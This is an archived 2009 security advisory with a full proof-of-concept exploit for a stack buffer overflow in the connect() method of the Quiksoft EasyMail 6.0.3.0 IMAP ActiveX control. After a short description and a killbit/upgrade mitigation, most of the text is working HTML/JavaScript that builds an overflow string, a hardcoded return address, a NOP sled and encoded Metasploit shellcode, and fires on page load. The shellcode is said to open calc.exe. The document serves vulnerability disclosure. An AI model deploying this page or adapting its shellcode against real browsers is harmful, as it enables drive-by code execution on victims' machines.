Quiksoft EasyMail 6.0.3.0 IMAP connect() Stack Overflow

2009-09-18T00:00:00
ID PACKETSTORM:81433
Type packetstorm
Reporter Sebastian Wolfgarten
Modified 2009-09-18T00:00:00

Description

                                        
                                            `<!--  
  
I - TITLE  
  
Security advisory: Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX   
stack overflow exploit  
  
II - SUMMARY  
  
Description: Remotely exploitable buffer overflow in ActiveX component  
Quiksoft EasyMail 6.0.3.0 allows for the arbitrary code execution in the  
user context.  
  
Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com),  
http://www.devtarget.org  
  
Date: September 17th, 2009  
  
Severity: Medium (remote code execution in the user context)  
  
References: http://www.devtarget.org/easymail-advisory-09-2009.txt  
  
III - OVERVIEW  
  
Quote from quiksoft.com: "The EasyMail Products are relied upon by over   
thousands  
of international corporations, federal, state and local organizations,   
and individual  
developers. Quiksoft has established the EasyMail products as "the   
professional,  
reliable, and easy to use choice for e-mail development". More   
information about  
the product can be found online at http://www.quiksoft.com.  
  
IV - DETAILS  
  
The software Quiksoft EasyMail 6.0.3.0 ships emimap4.dll, an ActiveX   
component  
to facilitate the development of IMAP4-aware applications. The connect()   
function  
of this component is prone to a classic buffer overflow vulnerability   
when a  
particularly long argument is passed and the application attempts to   
copy that  
data into a finite buffer. This allows for the execution of arbitrary   
code in the  
user context.  
  
V - MITIGATING MEASURES  
  
Either set the killbit for the relevant ActiveX component   
(clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D)  
or install the latest version of Quiksoft EasyMail which is not   
considered vulnerable.  
  
VI - NOTES  
  
Code below was taken from an exploit originally written by e.b  
(see http://www.milw0rm.com/exploits/4825). Thanks also to Francis   
Provencher  
for drawing my attention on Quiksoft EasyMail. Shellcode below is rather   
harmless and  
executes calc.exe.  
  
Tested on Windows XP SP2 English, IE6, emimap4.dll version 6.0.3.0  
  
-->  
  
<html>  
<head>  
<title>Quiksoft EasyMail 6.0.3.0 imap connect() stack overflow</title>  
<script language="JavaScript" defer>  
function Check() {  
  
var buf = 'A';  
while (buf.length <= 440) buf = buf + 'A';  
  
  
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378   
Encoder=Alpha2 http://metasploit.com  
var shellcode1 =   
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49" +  
  
"%48%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%43" +  
  
"%58%30%42%31%50%42%41%6b%42%41%53%42%32%42%41%32" +  
  
"%41%41%30%41%41%58%50%38%42%42%75%48%69%6b%4c%4d" +  
  
"%38%63%74%75%50%33%30%67%70%4c%4b%73%75%57%4c%6e" +  
  
"%6b%63%4c%45%55%63%48%33%31%58%6f%6c%4b%70%4f%77" +  
  
"%68%6e%6b%73%6f%71%30%65%51%6a%4b%72%69%4e%6b%36" +  
  
"%54%4e%6b%45%51%4a%4e%46%51%6b%70%4f%69%4c%6c%6e" +  
  
"%64%59%50%73%44%53%37%58%41%7a%6a%54%4d%33%31%78" +  
  
"%42%48%6b%7a%54%77%4b%52%74%66%44%34%44%62%55%59" +  
  
"%75%6e%6b%41%4f%36%44%45%51%6a%4b%53%56%4c%4b%46" +  
  
"%6c%72%6b%4c%4b%53%6f%37%6c%63%31%6a%4b%4e%6b%75" +  
  
"%4c%6c%4b%54%41%48%6b%4d%59%51%4c%51%34%34%44%4a" +  
  
"%63%30%31%6f%30%62%44%4e%6b%71%50%54%70%4b%35%6b" +  
  
"%70%50%78%46%6c%6c%4b%63%70%44%4c%4c%4b%44%30%35" +  
  
"%4c%6e%4d%6c%4b%61%78%55%58%6a%4b%64%49%4e%6b%6b" +  
  
"%30%6c%70%57%70%57%70%47%70%4c%4b%70%68%47%4c%71" +  
  
"%4f%44%71%6b%46%33%50%66%36%4f%79%4c%38%6e%63%4f" +  
  
"%30%71%6b%30%50%41%78%58%70%6c%4a%53%34%51%4f%33" +  
  
"%58%4e%78%39%6e%6d%5a%46%6e%61%47%4b%4f%69%77%63" +  
  
"%53%45%6a%33%6c%72%57%30%69%50%6e%62%44%70%6f%73" +  
  
"%47%41%63%41%4c%50%73%42%59%31%63%50%74%65%35%70" +  
  
"%6d%54%73%65%62%33%6c%30%63%41%71%70%6c%53%53%66" +  
"%4e%31%75%74%38%70%65%77%70%43");  
  
var eip = unescape("%0F%DD%17%7D"); // Windows XP SP2 English  
  
var nop = unescape("%90%90%90%90%90%90%90%90%90%90%90%90");  
  
var m = buf + eip + nop + shellcode1 + nop;  
  
obj.connect(m);  
}  
  
</script>  
</head>  
<body onload="JavaScript: return Check();">  
<object id="obj" classid="clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D">  
Failed to instantiate object.  
</object>  
</body>  
</html>  
`